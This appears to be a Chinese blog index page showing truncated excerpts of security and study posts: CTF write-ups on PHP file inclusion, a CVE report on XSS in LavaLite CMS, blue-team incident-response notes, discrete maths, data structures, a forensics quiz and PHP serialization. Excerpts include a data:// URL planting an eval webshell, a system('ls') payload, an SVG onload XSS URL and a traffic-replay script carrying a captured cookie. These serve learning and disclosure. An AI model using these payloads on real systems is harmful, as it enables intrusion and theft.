分类练习
文件包含
Web_php_include/1
代码审计:
include($page),使用了include这个文件包含函数,被include包含的$page通过get方式传入且可控。所以存在文件包含漏洞。但在判断在中通过strstr过滤了“php://”(当传入page时存在php://时候替换为空{即$page=str_replace(“php://”,“”,$page;)})
尝试用大小写,报错确定是linux系统
用BP抓包发送<php system(“ls”)?>
得到xxxxxxxxxxxxxxxxx
再次发送
得到flag
Web_php_include/2
利用data写入一句话木马
http://61.147.171.105:60509/?page=data://text/plain,<?php @eval($_POST['AHHH'])?>
利用蚁剑连接
fileclude
知识点
inlcude语句包含并运行指定文件。被包含文件先按参数给出的路径寻找,如果没有给出目录(只有文件名)时则按照include_path指定的目录寻找。如 ...
CVE-2024-31828
CVE-2024-31828
BUG_Author:
F1sher
Affected version:
LavaLite CMS v.10.1.0
Vendor:
https://github.com/LavaLite/cms
Software:
https://github.com/LavaLite/cms/releases/tag/v10.1.0
Describe the bug
Everyone can take advantage of a XSS vulnerability in the URL.
To Reproduce
Enter website address
1https://lavalite.org/docs/master/"><svg onload=alert(1)>
Expected behavior
Filter keywords such as onload and svg
Impact
Commonly include transmitting private data, like cookies or other sessi ...
离散数学
等值式
题1
题2
析取范式与合取范式
题1
主析取范式与主合取范式
题1
题2
题3
联结词的完备集
C
推理的相关公式
题1题2
自然推理系统P
题1
题2
题3
题4
谓词逻辑公式及其解释
题1
题2
谓词逻辑等值式与置换规则
题1
题2
题3
谓词逻辑前束范式
题1
题2
谓词逻辑的推理理论
题1
题2
题3
集合的基本概念
集合恒等式
题1
有序对与笛卡尔积
题1
有序对与笛卡尔积
二元关系
关系的运算
关系的性质
题1
题2
题3
题4
关系的闭包
等价关系与划分
偏序关系
函数的定义与性质
题2
题3
函数的复合与反函数
二元运算及其性质
群的定义
题3
图
通路与回路
图的连通性
图的矩阵表示
G
欧拉图与哈密顿图
题1
最小生成树
根数及其运用
平面图的基本概念
欧拉公式
蓝队
基本思路流程
1234561. 收集信息:收集客户信息和中毒主机信息,包括样本 2. 判断类型:判断是否是安全事件,何种安全事件,勒索、挖矿、断⽹、DoS 等等 3. 抑制范围:隔离使受害⾯不继续扩⼤ 4. 深⼊分析:⽇志分析、进程分析、启动项分析、样本分析⽅便后期溯源 5. 清理处置:杀掉进程,删除⽂件,打补丁,删除异常系统服务,清除后⻔账号防⽌事件扩 ⼤,处理完毕后恢复⽣产 6. 产出报告:整理并输出完整的安全事件报告
Windows入侵排查思路
检查系统账号安全
查看服务器是否有入口令,远程管理端口是否对公网开放(netstat -ano,或者问管理员)
lusrmagr.msc查看服务器是否存在隐藏账号
用D盾或者注册表中查看服务器是否存在隐藏账号,克隆账号
结合日志,查看管理员登陆时间,用户名是否存在异常
检查⽅法:Win+R 打开运⾏,输⼊“eventvwr.msc”,回⻋运⾏,打开“事件查看 器”,导出 Windows ⽇志–安全,利⽤ Log Parser 进⾏分析
检查异常端口,进程
netstat -ano 检查端⼝连接情况,是否有远程连接、可疑连接
任务管理器-进 ...
蓝队
中间人重放
Wireshark抓取可疑流量
追踪http流或者tcp,抓GET包
将得到的cookie,port,host,放到假上线脚本
12345678910111213141516171819202122232425262728293031323334# coding: utf-8import reimport timeimport requestsdef heartbeat(): url = "http://123.56.234.220/en_US/all.js" headers = { 'Cookie': 'YQ4XB33mtS2F6ajcK2NoFl57OKGdyBfx2EuTSx22JGmSnCtWiuUNZ8dbVVFc2iAJVwUrpFUS70Mf7cRoWt2GMlL5BAO6hIiHtbA0jhpRO7WmHs4ET3bLzqSsKw787W1t0hjpejmQZyRyqOc5uIHkjE176/bLOfI3A88492zxeug=', ...
正则表达式
人生苦短,学点东西怎么能行,Go!!\
做题的时候遇到好多正则匹配看不懂,只能上网搜,现在遇到一个脚本用了正则都看不懂了,打算学一下,起码能看懂, day0
正则表达式
https://blog.csdn.net/xuemoyao/article/details/8033138?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166813125416800180680037%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=166813125416800180680037&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-2-8033138-null-null.142
Character Class
Meaning
[:alpha:]
任何字母,[A-Za-z] ...
盘古石练习题
盘古石练习题
每道题5分,共计200分
一、请检查窝点中的手机检材,回答以下问题
1、 该OPPO手机的IMEI是:
A. 860370043989014,860370049389006
B. 860370049389014,860370049389006
C. 860370049389014,860370043989006
D. 860370049839014,860370049839006
2、 该涉案人所使用的的微信ID和关联的手机号是:
A. wxid_rn6kc87f1mb354 16521330311
B. wxid_rn5mjxpw1mb922 17721103461
C. wxid_wi8nf67f1lmd54 15528880561
D. wxid_kshn457f1lm123 15847880501
3、 涉案团伙的最后线下犯罪窝点地址是:
A. 闵行区古美西路86弄44号
B. 田林路1036号科技绿洲三期16号楼101室
C. 上海市合川路科技绿洲3期5-3号楼
D. 闵行区合川路2555号
4、 犯罪团伙所用的诈 ...
数据结构复习表
数据结构复习表
*章节*
*概念*
*简答计算*
*操作*
*算法设计*
绪论
数据结构逻辑结构和存储结构算法时间复杂度
能对给定的算法分析时间复杂度、空间复杂度
线性表
顺序表单链表
顺序表和链表的优缺点对比P48表2.2熟记已知数据元素大小,对顺序表中第i个元素的地址进行推导计算由数据元素在内存的存储推导数据元素之间的后继关系
单链表的删除、插入,不写算法
顺序表、单链表根据指定复杂度的要求设计算法,没给出复杂度要求的,自行设计
栈和队列
栈和队列
入栈、出栈序列,入队、出队序列的合法性判断,循环队列有关的队空、队满的条件判断、出入队操作
循环队列的实现双栈的实现
串、数组和广义表
广义表
模式串的next函数值(考研)数组的行为主、列为主存储时元素地址计算特殊矩阵的存储,计算地址广义表取表头表尾
树和二叉树
二叉树满二叉树,完全二叉树线索线索二叉树和线索化 哈夫曼树,哈夫曼编码,前缀编码WPL
基于二叉树5条性质的、基于二叉树5条性质+某种形态(比如满,完全,哈夫曼)推导计算顶点个数、树的层数等。二叉树有哪些不同形态WPL的计算P140习题 ...
数据结构与算法分析
数据结构与算法分析
概念
\1. 数据:数据是客观事物的符号表示,是所有能输入计算机中被计算机程序处理的符号的总称。
\2. 数据元素:数据元素是数据的基本单位,在计算机中通常作为一个整体进行考虑和处理。
\3. 数据项:数据项是组成数据元素的、有独立含义的的、不可分割的最小单位。
\4. 数据对象:数据对象是性质相同的数据元素的集合,是数据的一个子集。
\5. 数据结构:相互之间存在一种或多种特定关系的数据元素的集合。
\6. 逻辑结构:逻辑结构是从逻辑关系上描述数据,它与数据的存储无关,是独立于计算机的。
7. *数据元素的四种关系:*
集合结构:数据元素之间除了“属于同一集合”关系外,别无其它关系。
线性结构:数据结构之间存在一对一的关系。
树结构:数据元素之间存在一对多的关系。
图结构或网状结构:数据结构之间存在多对多的关系。
\8. 存储结构:数据对象在计算机中的存储表示。(物理结构)
(1)顺序存储结构:借助元素在存储器中的相对位置来表示数据元素之间的逻辑关系的,通常借助程序设计语言的数组类型来描述。(2)链式存储结构:无需占用一整块空间,但为了表示结点间的关系,需要给每个 ...
序列化与反序列化
序列化与反序列化
之前看过的这篇还是比较好的
原理+实践掌握(PHP反序列化和Session反序列化) - 先知社区 (aliyun.com)
后来补的文章
PHP反序列化入门手把手详解 - FreeBuf网络安全行业门户
序列化的概念
将对象或者数组转化为可存储的字符串。
序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存和cookie等。
1234567891011121314<?php#创建一个类class test{ public $a = 'sdfsdfa'; protected $b = 1111; private $c = false; public function displayVar() { echo $this->a; }}$d = new test(); //实例化对象$d = serialize($d);//序列化对象var_dump($d);//输出序列化后的结果?>
运行结果:
1st ...